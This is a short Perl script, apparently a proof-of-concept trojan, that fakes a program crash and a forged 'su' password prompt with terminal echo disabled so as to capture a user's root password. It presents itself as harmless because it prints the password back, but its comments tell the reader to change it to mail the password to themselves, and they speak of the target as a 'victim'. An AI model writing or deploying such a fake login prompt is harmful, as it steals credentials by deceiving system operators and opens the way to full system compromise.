#!/usr/bin/perl # # by Gr@ve_Rose # We all know about fancy programs that take over you system # but what about programs that rely on the ineptitude of # the operator? Here is the basic idea: # # 1. Start making a program, something small like a game. # 2. Make it crash. Well, not really, just look like it crashed. # 3. Pretend that it was a serious crash, serious enough that # your 'game' might do bad system things. # 4. Get them to 'su'. # 5. One free root password. # # Obviously if your 'game' would do something bad, your up-to-date # wouldn't let it. But, if the person operating it doesn't know that... :) # use strict; # Get the hostname to make it look like a real "system drop" instead # of just typing [guest@localhost /]$ chop(my $host = `/bin/hostname`); # # FALSE PROGRAM GOES HERE # # Turn the echo off so it seems like they're using 'su' system ("stty -echo"); # Make it look like the program died while making a system call # (Feel free to make a 'real' excuse) print "\n"; print "Error: unhandled system exception at line 10.\n"; # Like this will ever happen, but, hey, it's all about how much your # victim doesn't know! ;) print "Dropping you to a guest account for safety. Please 'su' back to root\n"; # Make some apologetic reason that your 'program' died print "Yeah, this program needs to be fixed. Sorry for the inconvenience.\n"; print "\n"; # One 'real' system prompt calling 'su' coming up.... print "[guest@"; print "$host /]\$ su "; print "\n"; print "password:"; # Come to daddy my $command = ; # Change the following lines to mail the password to you # You'll need to add a few things like full hostname and, hopefully, # an IP address system ("clear"); print "\n"; print "Your root password is: $command\n"; print "Thankfully this is just a proof-of-concept program.\n"; print "You may want to be more cautious in the future.\n"; print "\n"; print "Gr\@ve_Rose\n"; print "\n"; # Turn echo back on so we can see what we are typing system ("stty echo");